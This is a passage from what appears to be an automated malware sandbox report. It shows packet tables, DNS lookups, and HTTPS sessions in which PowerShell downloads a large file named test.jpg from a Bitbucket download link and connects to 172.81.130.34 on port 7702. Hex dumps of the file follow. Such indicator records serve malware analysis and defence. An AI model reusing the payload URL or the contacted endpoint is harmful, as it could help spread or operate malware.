                                                                                                            Feb 6, 2025 11:23:21.876369953 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876378059 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:21.876379967 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876405001 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:21.876414061 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876422882 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:21.876422882 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876461983 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876472950 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876507044 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876517057 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876580000 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876595974 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876631975 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876641035 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876657963 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876667023 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876717091 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876724958 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876744986 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876754045 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876812935 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876821995 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876849890 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876858950 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876869917 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876939058 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.876948118 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880707026 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880781889 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880835056 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880916119 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880924940 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880976915 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.880986929 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881028891 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881067991 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881120920 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881139994 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881248951 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881272078 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881382942 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881392956 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881426096 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881437063 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881493092 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881503105 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881544113 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881552935 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881624937 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881633997 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881656885 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881669998 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881705999 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881715059 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881741047 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881751060 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881863117 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881877899 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881886005 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881891012 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:21.881891966 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:22.401246071 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:22.406132936 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:22.408246040 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:22.413023949 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:22.758727074 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:22.806482077 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:22.981750965 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:22.996867895 CET497127702192.168.2.9172.81.130.34
                                                                                                            Feb 6, 2025 11:23:23.001929998 CET770249712172.81.130.34192.168.2.9
                                                                                                            Feb 6, 2025 11:23:23.001991987 CET497127702192.168.2.9172.81.130.34

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Feb 6, 2025 11:23:05.312016010 CET5089553192.168.2.91.1.1.1
                                                                                                            Feb 6, 2025 11:23:05.319273949 CET53508951.1.1.1192.168.2.9
                                                                                                            Feb 6, 2025 11:23:06.514496088 CET5125153192.168.2.91.1.1.1
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET53512511.1.1.1192.168.2.9
                                                                                                            Feb 6, 2025 11:23:16.602268934 CET5692653192.168.2.91.1.1.1
                                                                                                            Feb 6, 2025 11:23:16.635013103 CET53569261.1.1.1192.168.2.9
                                                                                                            Feb 6, 2025 11:23:20.090142965 CET5991553192.168.2.91.1.1.1
                                                                                                            Feb 6, 2025 11:23:20.098490000 CET53599151.1.1.1192.168.2.9

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Feb 6, 2025 11:23:05.312016010 CET192.168.2.91.1.1.10xaa01Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.514496088 CET192.168.2.91.1.1.10xbebfStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:16.602268934 CET192.168.2.91.1.1.10x8db9Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:20.090142965 CET192.168.2.91.1.1.10x8cb2Standard query (0)90.156.5.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Feb 6, 2025 11:23:05.319273949 CET1.1.1.1192.168.2.90xaa01No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:05.319273949 CET1.1.1.1192.168.2.90xaa01No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:05.319273949 CET1.1.1.1192.168.2.90xaa01No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com52.217.123.233A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com16.15.200.129A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.130A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.104A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com54.231.233.65A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com16.15.176.137A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com3.5.27.42A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:06.746474028 CET1.1.1.1192.168.2.90xbebfNo error (0)s3-w.us-east-1.amazonaws.com3.5.22.93A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:16.635013103 CET1.1.1.1192.168.2.90x8db9No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:16.635013103 CET1.1.1.1192.168.2.90x8db9No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:16.635013103 CET1.1.1.1192.168.2.90x8db9No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:16.635013103 CET1.1.1.1192.168.2.90x8db9No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                            Feb 6, 2025 11:23:20.098490000 CET1.1.1.1192.168.2.90x8cb2Name error (3)90.156.5.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • bitbucket.org
                                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                                            • raw.githubusercontent.com

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.949707185.166.143.484436164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-02-06 10:23:05 UTC112OUTGET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1
                                                                                                            Host: bitbucket.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-02-06 10:23:06 UTC6193INHTTP/1.1 302 Found
                                                                                                            Date: Thu, 06 Feb 2025 10:23:06 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 0
                                                                                                            Server: AtlassianEdge
                                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-4304-9ad4-390a9c315303/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNJAHMAL6S&Signature=w8QLfWia3a8r%2BiYjjFjFdrPeecE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEMaCXVzLWVhc3QtMSJIMEYCIQCIMRm00Eflqgx92Zb5hjhDlOsAWjcmJXoIzTwy3jhQfQIhAL2iwdNdFh9WQHjU6sfHZcdDgULvyp4qiKvIJJATLWoFKqcCCFwQABoMOTg0NTI1MTAxMTQ2IgwRyvFiO6JYgc%2BWUxcqhALdv3kcJyDGONOnQFWIbYrOg9vq2du%2FAuM22kDUrrliSG6e8KUPlIDC9qm13iyJxS3WTbHFk393gHi3cHle5mk27SW3hViE19830Wj88B8fQdZllu1Zg1uRMD2zgESGYpnPyT6mJ8ARHgwGrUGOezpHUYbtThx6EZSJyeohrS1zvU%2BIH%2B1iIbc41rpO2%2Fj34f01U%2F7um7nRNysJqbB%2BipN2wG1zLj%2BE%2FR%2FAjt6t%2B4wtUO8JXkvKfQdosAcVzhchlRy0%2BYKjFMngCFhEu6%2B%2F%2FVwRSesjel7yahuYGJHPmqIKWxRUp50u7TiCJYi8BLKr2LvaB1TfAc5SMXvUQUF9OIBLOxS3JTDHmpK9BjqcAbjhg3HAai%2BHWzN8tL%2BFKav8G%2F0lvqtkVHS3pSmZUJbbI3e8l6TN%2Fv2BDKf3X43G4EgJgKec2mkK46ZNxvo%2Bwl%2FM6pxAuPWsXeag9ablP25TEL6uZYLZymBRrBNlWRZb5 [TRUNCATED]
                                                                                                            Expires: Thu, 06 Feb 2025 10:23:06 GMT
                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                            X-Used-Mesh: False
                                                                                                            Vary: Accept-Language, Origin
                                                                                                            Content-Language: en
                                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                            X-Dc-Location: Micros-3
                                                                                                            X-Served-By: 0b97b2c6d5a6
                                                                                                            X-Version: cfba930f5809
                                                                                                            X-Static-Version: cfba930f5809
                                                                                                            X-Request-Count: 415
                                                                                                            X-Render-Time: 0.04203438758850098
                                                                                                            X-B3-Traceid: 2ff7df095bc34c2cb1d47f241aca5afa
                                                                                                            X-B3-Spanid: e335044358272453
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED]
                                                                                                            X-Usage-Quota-Remaining: 999196.273
                                                                                                            X-Usage-Request-Cost: 815.93
                                                                                                            X-Usage-User-Time: 0.022261
                                                                                                            X-Usage-System-Time: 0.002217
                                                                                                            X-Usage-Input-Ops: 0
                                                                                                            X-Usage-Output-Ops: 0
                                                                                                            Age: 0
                                                                                                            X-Cache: MISS
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                            Atl-Traceid: 2ff7df095bc34c2cb1d47f241aca5afa
                                                                                                            Atl-Request-Id: 2ff7df09-5bc3-4c2c-b1d4-7f241aca5afa
                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                            Server-Timing: atl-edge;dur=150,atl-edge-internal;dur=3,atl-edge-upstream;dur=148,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.94970852.217.123.2334436164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-02-06 10:23:07 UTC1173OUTGET /15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-4304-9ad4-390a9c315303/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNJAHMAL6S&Signature=w8QLfWia3a8r%2BiYjjFjFdrPeecE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEMaCXVzLWVhc3QtMSJIMEYCIQCIMRm00Eflqgx92Zb5hjhDlOsAWjcmJXoIzTwy3jhQfQIhAL2iwdNdFh9WQHjU6sfHZcdDgULvyp4qiKvIJJATLWoFKqcCCFwQABoMOTg0NTI1MTAxMTQ2IgwRyvFiO6JYgc%2BWUxcqhALdv3kcJyDGONOnQFWIbYrOg9vq2du%2FAuM22kDUrrliSG6e8KUPlIDC9qm13iyJxS3WTbHFk393gHi3cHle5mk27SW3hViE19830Wj88B8fQdZllu1Zg1uRMD2zgESGYpnPyT6mJ8ARHgwGrUGOezpHUYbtThx6EZSJyeohrS1zvU%2BIH%2B1iIbc41rpO2%2Fj34f01U%2F7um7nRNysJqbB%2BipN2wG1zLj%2BE%2FR%2FAjt6t%2B4wtUO8JXkvKfQdosAcVzhchlRy0%2BYKjFMngCFhEu6%2B%2F%2FVwRSesjel7yahuYGJHPmqIKWxRUp50u7TiCJYi8BLKr2LvaB1TfAc5SMXvUQUF9OIBLOxS3JTDHmpK9BjqcAbjhg3HAai%2BHWzN8tL%2BFKav8G%2F0lvqtkVHS3pSmZUJbbI3e8l6TN%2Fv2BDKf3X43G4EgJgKec2mkK46ZNxvo%2Bwl%2FM6pxAuPWsXeag9ablP25TEL6uZYLZymBRrBNlWRZb5%2BVRPHck0Ly%2FNNnW1Ub4RccRCeKt1jEIP1Ni7%2BZ [TRUNCATED]
                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-02-06 10:23:07 UTC524INHTTP/1.1 200 OK
                                                                                                            x-amz-id-2: gBlvuKws+rX6jnmHhHfD7/W1TFlOGzjqeV1CSR0DHnjRmnAXa4DfkItm0vtdoBIcicowzgS2DZs=
                                                                                                            x-amz-request-id: XMYHH59QVM301Y2Y
                                                                                                            Date: Thu, 06 Feb 2025 10:23:08 GMT
                                                                                                            Last-Modified: Thu, 30 Jan 2025 11:22:03 GMT
                                                                                                            ETag: "a51d588b44a048c259a7125301523070"
                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                            x-amz-version-id: PbfhhN.6JrWNhUUOP450n7EWePgmLK02
                                                                                                            Content-Disposition: attachment; filename="test.jpg"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Type: image/jpeg
                                                                                                            Content-Length: 5747868
                                                                                                            Server: AmazonS3
                                                                                                            Connection: close
                                                                                                            2025-02-06 10:23:07 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                                            Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                                            2025-02-06 10:23:07 UTC500INData Raw: eb 3c d1 e8 12 f2 75 69 52 e5 97 4e 66 84 b9 5a d2 25 44 d0 af 6c 97 2a 95 73 d8 71 9c fa f5 ed e3 f4 d9 d7 ce 5a 4d 67 3a ca 99 cb 78 da 53 5d 33 74 9c 5d 36 c7 d1 c9 d5 8d b6 a7 3b d3 8b 4d ae 78 e7 bb 1d e6 37 c7 3b 15 ad 63 33 75 2b 9d 22 27 0d a2 c4 dc d3 55 72 ac fa f5 ce bc cb f5 26 38 15 2e 9c f1 95 96 a7 6b c6 65 e9 c8 cc 26 ab 51 f5 73 56 34 dc e8 ba 54 6d cb ac 8d 67 53 71 26 d5 13 46 3b 55 cf 2f 49 a4 b1 1b cc 65 3d 31 ac 40 e9 7e 53 af ce db d5 e6 ec 32 52 eb 78 d1 b6 0e 4d 76 e5 d0 d0 ba cd 83 45 2b 8b d6 39 33 ec 55 c8 74 69 67 97 cd ed 3b 3c 2f 23 ed 39 b5 3e 12 7e d3 87 a6 3c 3e 9e ce 7a ea f4 be 76 73 af ab 3e 77 b3 37 d9 5c da 67 5b f4 72 e9 93 6a 97 a6 b1 59 ba de 34 ba d7 33 97 6b c2 a3 7a e1 d6 cd c9 72 d2 50 68 42 36 ce 82 27 46 99
                                                                                                            Data Ascii: <uiRNfZ%Dl*sqZMg:xS]3t]6;Mx7;c3u+"'Ur&8.ke&QsV4TmgSq&F;U/Ie=1@~S2RxMvE+93Utig;</#9>~<>zvs>w7\g[rjY43kzrPhB6'F
                                                                                                            2025-02-06 10:23:07 UTC16384INData Raw: e7 d5 1c 99 eb 97 a3 cd 8c 69 d5 97 3c dc e7 cb e8 1a 9e 24 fb 77 67 99 e9 de f8 de fd 7c 3d 1c 7b ef 5c 8b 3d 3b 23 96 ce 89 53 25 64 b1 d6 7a a3 87 0d 63 d4 db c4 b4 f6 1f 93 dd 9e 9b 4e b9 4d 67 1b e7 72 b6 57 35 05 b8 96 85 27 5c c6 56 65 4d 48 b6 c7 9e e7 a9 f2 ea 6b 59 cc d6 a6 70 9a c2 e7 3a 5e 41 59 39 d6 75 8d 33 b2 9a a9 66 7a 09 72 cb b3 32 75 1c d2 34 23 9a 7a 27 59 99 dd 2e 51 b0 98 73 fa 19 6f 9f 01 e8 e5 79 f2 f3 7a 71 a7 cd 78 9f 79 c9 d3 97 c4 72 7d cf 0f 5c fc 93 f7 79 7a 4e 47 9f 06 b1 d9 b7 0f 6d d6 f5 e6 65 2f d0 74 f8 fb 47 a9 a7 9b 38 d7 a9 d1 e5 19 d7 b9 1c 39 cb e9 2c 3a 64 ad b2 bc ab 97 a5 2f 2f 46 71 5d 79 e7 ac 67 4b 2a d6 5e d0 ed 03 87 cc 74 76 72 6f 8b b6 34 a5 35 84 15 1d 32 e3 1d 70 bc e7 52 39 d7 6f 3c 13 15 63 b5 b9 86
                                                                                                            Data Ascii: i<$wg|={\=;#S%dzcNMgrW5'\VeMHkYp:^AY9u3fzr2u4#z'Y.Qsoyzqxyr}\yzNGme/tG89,:d//Fq]ygK*^tvro452pR9o<c
                                                                                                            2025-02-06 10:23:07 UTC1024INData Raw: 76 95 d8 f8 ba 23 49 05 cc da 01 09 35 74 2c 65 65 83 77 2e 79 ef 91 86 9b 65 ac ab c8 b9 dd 65 32 ee 73 b3 45 2a c5 a6 71 73 ac e7 bc d6 71 d7 28 ad 3c ed ad 14 b9 9b 3b 39 67 77 73 ca f6 a8 53 ba 6b 2d 34 85 27 58 95 2b 95 ce 77 69 9a d1 c5 0a 9a 9c f7 c5 13 15 35 35 15 96 b9 cd 6b 9b 76 67 6d d2 d1 3c d8 cf 69 b3 13 69 4a bc e8 aa ca 82 34 c4 aa c5 59 b3 e5 2e 7a 4e 50 e8 c1 2e 9c b2 e5 ee ad 73 f2 6f d3 bb 3c 9c bd 6c 2c f3 39 3d b8 d4 f1 a7 d6 e7 d3 ca cf 4e 6d e7 5e 5d 23 4e cf 6f e3 9e 37 fa 3f 4f c4 7b 1e 6f 4f bd b7 99 d3 cb a7 4c c9 8b a9 32 d5 66 1a c2 68 45 22 44 97 2f 5e 5d 66 1a 5c e3 3b d1 84 f4 4d cf 0e 7e 9d 1e 76 5e 98 9e 3e 7e f2 d4 f0 2f d7 8a e2 eb 08 ec db 9f 6e 1e 8b bc e3 3d 7b 17 39 35 d1 11 26 a6 05 9d 0f 3b ce 88 d2 ec e5 37 88
                                                                                                            Data Ascii: v#I5t,eew.yee2sE*qsq(<;9gwsSk-4'X+wi55kvgm<iiJ4Y.zNP.so<l,9=Nm^]#No7?O{oOL2fhE"D/^]f\;M~v^>~/n={95&;7
                                                                                                            2025-02-06 10:23:07 UTC16384INData Raw: 9e f5 78 75 e8 86 e4 ca aa 8c cd 62 1c d2 21 69 ad 64 ba 73 9a c7 55 69 15 64 b8 46 f5 73 cf 7a dc bc 93 da f5 38 eb a3 43 80 eb 94 e0 5d b9 6b 38 c7 54 1c d9 76 ed 67 9c fd 38 8c e9 f3 b5 d7 bf 9b a4 be 9c 72 f3 e3 a7 a5 a7 99 d3 2f 62 e7 53 5b a8 a9 66 76 94 e7 5d 78 eb 38 6c 63 73 d3 83 83 1c 7b eb 7c bc d3 b7 2d e7 0a df 14 8e 8e 7b 97 a6 b0 59 e9 d5 af 06 92 f5 9c 15 35 da b9 75 97 48 75 29 1a 52 f2 be aa 8f 39 7a 33 ac f0 cf a0 27 95 db d1 26 6a 39 35 8e d8 f3 31 e9 cf d1 9f 31 6b 3e 85 70 07 a9 d3 e2 5c be ca f2 fa 31 bd b9 f5 d2 e7 8c eb 9b 8f 17 c3 fa cf 0b b4 e1 c3 0c 3d 1c fa ce 8c 99 9e df 3d af 5c 61 72 f4 3f 37 59 3d 2e 9f 32 73 be dd 78 f4 3b f3 e5 ed cd ab cf 5c d9 c6 b2 b3 b3 19 d2 5c de 9b 9c 95 69 1e 73 a5 69 9f 5e d8 d7 9d 7d aa b3 bc
                                                                                                            Data Ascii: xub!idsUidFsz8C]k8Tvg8r/bS[fv]x8lcs{|-{Y5uHu)R9z3'&j9511k>p\1==\ar?7Y=.2sx;\\isi^}
                                                                                                            2025-02-06 10:23:07 UTC1024INData Raw: 87 9d 08 54 5a b7 9b 1b 48 a7 9b 28 cb 1b 9e ba e2 d0 e9 8c 1c d7 41 92 4d a6 18 c4 cc 9d d1 85 d8 b2 db 58 a4 14 05 93 3a 44 19 6c cc de d0 62 f5 a6 79 0e a9 d6 72 ad de 77 ce f6 6b 24 54 ac 4c 73 69 25 0a 54 5a 13 a2 a2 a8 24 75 10 e9 54 61 d3 17 1c 99 f6 46 f9 70 cf 54 6f 94 e5 d3 cb 37 bf 4f c4 fa fa d7 d1 d7 9b d3 cf a6 b9 21 9d 15 56 3a 62 fa 59 cb 3d 93 73 ce 50 50 85 a7 85 a8 95 a4 e7 d0 27 14 f7 1a cf 35 6f 13 53 36 18 e1 db a5 cf 93 97 b5 9d cf 95 3e c1 67 95 8f b9 9d 79 77 df 6c f9 f5 df 33 5c 5b 75 07 1e 9b 29 79 b5 76 61 5b 4a cd e7 8d 9d 99 73 e9 35 b2 33 35 cf 25 71 d5 af 33 c7 4d 6f 08 3a 5f 2a b3 d0 cf 9b 03 d2 7e 78 77 4e 1a 4b a6 9c fa 4d 5c d3 97 0d 98 62 f4 ab 30 9b 2e 67 1e a6 72 5e 85 cf 3e 7d b5 67 09 d6 ac e1 cf ba b5 9f 27 4e c5
                                                                                                            Data Ascii: TZH(AMX:Dlbyrwk$TLsi%TZ$uTaFpTo7O!V:bY=sPP'5oS6>gywl3\[u)yva[Js535%q3Mo:_*~xwNKM\b0.gr^>}g'N
